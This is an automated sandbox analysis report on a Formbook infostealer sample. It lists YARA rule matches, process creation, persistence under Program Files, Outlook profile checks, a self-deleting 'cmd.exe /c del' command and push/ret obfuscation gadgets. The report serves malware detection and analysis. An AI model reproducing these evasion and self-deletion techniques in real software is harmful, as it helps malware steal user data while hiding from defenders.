Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.1229429028.00000000038EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Classification label
Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@22/6@8/3
Creates files inside the user directory
Source: C:\Windows\SysWOW64\WWAHost.exe; File created: C:\Users\user\AppData\Roaming\8KA1218A
Creates mutexes
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_01
Creates temporary files
Source: C:\Windows\explorer.exe; File created: C:\Users\user\AppData\Local\Temp\Uolmxh0
PE file has an executable .text section and no other executable section
Source: ACre0O2rKa.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application use the VB runtime library 6.0 (probably coded in Visual Basic)
Source: C:\Users\user\Desktop\ACre0O2rKa.exe; Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe; Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Reads ini filesShow sources
Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\ACre0O2rKa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: ACre0O2rKa.exeVirustotal: Detection: 74%
Source: ACre0O2rKa.exeReversingLabs: Detection: 82%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\ACre0O2rKa.exe 'C:\Users\user\Desktop\ACre0O2rKa.exe'
Source: unknownProcess created: C:\Users\user\Desktop\ACre0O2rKa.exe C:\Users\user\Desktop\ACre0O2rKa.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ACre0O2rKa.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe
Source: unknown Process created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe 'C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: unknown Process created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: unknown Process created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: unknown Process created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe 'C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: unknown Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: unknown Process created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: unknown Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Process created: C:\Users\user\Desktop\ACre0O2rKa.exe C:\Users\user\Desktop\ACre0O2rKa.exe'
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe 'C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe 'C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ACre0O2rKa.exe'
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Process created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Writes ini files
Source: C:\Windows\SysWOW64\WWAHost.exe File written: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogri.ini
Found graphical window changes (likely an installer)
Source: Window Recorder Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Windows\SysWOW64\WWAHost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Binary contains paths to debug symbols
Source: Binary string: WWAHost.pdb source: ACre0O2rKa.exe, 00000001.00000002.646478162.0000000006BF0000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 00000010.00000003.1106836628.0000000000673000.00000004.00000001.sdmp
Source: Binary string: wscript.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1103000514.0000000002190000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.626009404.000000000D160000.00000002.00000001.sdmp
Source: Binary string: msdt.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 00000014.00000002.1136585300.0000000006CB0000.00000040.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP source: ACre0O2rKa.exe, 00000001.00000002.646478162.0000000006BF0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: ACre0O2rKa.exe, 00000001.00000002.647439064.0000000006EAF000.00000040.00000001.sdmp, WWAHost.exe, 00000003.00000002.1228048773.00000000033C0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1109567888.0000000006EEF000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000010.00000002.1112600401.0000000006E10000.00000040.00000001.sdmp, wscript.exe, 00000012.00000002.1105602739.000000000498F000.00000040.00000001.sdmp, cmstp.exe, 00000013.00000002.1110322751.0000000004AA0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000014.00000002.1137111824.0000000006E40000.00000040.00000001.sdmp, msdt.exe, 00000015.00000002.1136038933.000000000100F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ACre0O2rKa.exe, WWAHost.exe, 5jd0x8e0uzsd8l.exe, 5jd0x8e0uzsd8l.exe, 00000010.00000002.1112600401.0000000006E10000.00000040.00000001.sdmp, wscript.exe, 00000012.00000002.1105602739.000000000498F000.00000040.00000001.sdmp, cmstp.exe, 00000013.00000002.1110322751.0000000004AA0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000014.00000002.1137111824.0000000006E40000.00000040.00000001.sdmp, msdt.exe, 00000015.00000002.1136038933.000000000100F000.00000040.00000001.sdmp
Source: Binary string: wscript.pdb source: 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1103000514.0000000002190000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: 5jd0x8e0uzsd8l.exe, 00000010.00000003.1106836628.0000000000673000.00000004.00000001.sdmp
Source: Binary string: msdt.pdb source: 5jd0x8e0uzsd8l.exe, 00000014.00000002.1136585300.0000000006CB0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.626009404.000000000D160000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Unpacked PE file: 1.2.ACre0O2rKa.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Unpacked PE file: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Unpacked PE file: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Unpacked PE file: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E40 push 004012B8h; ret 0_2_00402E53
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A44 push 004012B8h; ret 0_2_00402A57
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403444 push 004012B8h; ret 0_2_00403457
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403048 push 004012B8h; ret 0_2_0040305B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C4C push 004012B8h; ret 0_2_00402C5F
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402850 push 004012B8h; ret 0_2_00402863
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403250 push 004012B8h; ret 0_2_00403263
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E54 push 004012B8h; ret 0_2_00402E67
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A58 push 004012B8h; ret 0_2_00402A6B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403458 push 004012B8h; ret 0_2_0040346B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_0040305C push 004012B8h; ret 0_2_0040306F
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C60 push 004012B8h; ret 0_2_00402C73
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402864 push 004012B8h; ret 0_2_00402877
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403264 push 004012B8h; ret 0_2_00403277
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E68 push 004012B8h; ret 0_2_00402E7B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A6C push 004012B8h; ret 0_2_00402A7F
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_0040346C push 004012B8h; ret 0_2_0040347F
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403070 push 004012B8h; ret 0_2_00403083
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C74 push 004012B8h; ret 0_2_00402C87
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402878 push 004012B8h; ret 0_2_0040288B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403278 push 004012B8h; ret 0_2_0040328B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E7C push 004012B8h; ret 0_2_00402E8F
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402800 push 004012B8h; ret 0_2_00402813
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403200 push 004012B8h; ret 0_2_00403213
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E04 push 004012B8h; ret 0_2_00402E17
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A08 push 004012B8h; ret 0_2_00402A1B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403408 push 004012B8h; ret 0_2_0040341B
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_0040300C push 004012B8h; ret 0_2_0040301F
Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C10 push 004012B8h; ret 0_2_00402C23
